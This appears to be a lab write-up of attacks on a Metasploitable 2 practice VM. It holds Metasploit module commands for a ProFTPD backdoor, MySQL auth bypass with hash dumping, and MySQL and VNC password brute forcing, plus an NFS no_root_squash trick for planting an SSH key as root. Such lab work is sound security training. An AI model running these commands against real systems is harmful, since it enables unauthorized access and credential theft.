Failed

The nfsmount module asks mountd for the export list through the portmapper, so its RPORT is 111 (the default); pointing it at 2049, the NFS data port, is why it failed. With the default RPORT, or with showmount -e 192.168.190.129, Metasploitable 2 reveals that it exports / to everyone (*) with no_root_squash, which lets the whole filesystem be mounted and, for example, an attacker SSH key written into /root/.ssh/authorized_keys.

PORT - 2121/tcp open ftp ProFTPD 1.3.1

  1. Backdoor
search proftpd
use exploit/unix/ftp/proftpd_133c_backdoor 
set RHOSTS 192.168.190.129
set RPORT 2121
exploit

Result

Failed

This is expected: the backdoor was planted only in the ProFTPD 1.3.3c source archive served from a compromised mirror in late 2010, and this server runs 1.3.1. Note also that the module targets port 21 (the vsftpd instance) unless RPORT is set to 2121.

  2. Check for anonymous login:
ftp 192.168.190.129 2121
Name: anonymous
Password: anything

Result

Failed. This ProFTPD instance does not allow anonymous logins (the vsftpd on port 21 does).

3306/tcp open mysql MySQL 5.0.51a-3ubuntu5

  1. MySQL authentication bypass (CVE-2012-2122)

CVE-2012-2122 is a password-check bug in some MySQL and MariaDB builds: the result of memcmp on the password token is stored in a char, so when memcmp returns a value outside -128..127 a wrong password is accepted, roughly one attempt in 256. Only builds whose memcmp can return such values (typically certain 64-bit optimised builds) are affected. Metasploit's mysql_authbypass_hashdump module hammers the login and dumps the user hashes if the bypass works.

use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set RHOSTS 192.168.190.129
run

Result

FAILED. The 32-bit Ubuntu 5.0.51a build here is not affected by the bypass.

  2. Brute-force the login

use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.190.129
set USERNAME root
set PASS_FILE /home/luvranjan/Desktop/ESEC/passwords.txt
run

RESULTS

FAILED. The wordlist did not contain the right value: Metasploitable 2's MySQL root account has an empty password, so either add a blank line to the list or enable the module's BLANK_PASSWORDS option; the mysql client then connects as root with no password at all.

PORT - 5900/tcp open vnc VNC (protocol 3.3)

  1. Check whether authentication is required:
vncviewer 192.168.190.129:5900

(TightVNC/TigerVNC viewers read a number of 100 or more after the colon as a TCP port; host::5900 or plain host, display :0, are equivalent.) The nmap vnc-info output already said the only security type is "VNC Authentication (2)", so the viewer prompts for a password.

Output

  2. Brute force with Metasploit:
use auxiliary/scanner/vnc/vnc_login
set RHOSTS 192.168.190.129
set RPORT 5900
set PASS_FILE /home/luvranjan/Desktop/ESEC/passwords.txt
run

OUTPUT

The scanner finds the password: Metasploitable 2's VNC password is "password", and the VNC session is a root desktop. Classic VNC authentication is a DES challenge-response keyed by only the first 8 characters of the password, with no lockout, which is why brute force is cheap.
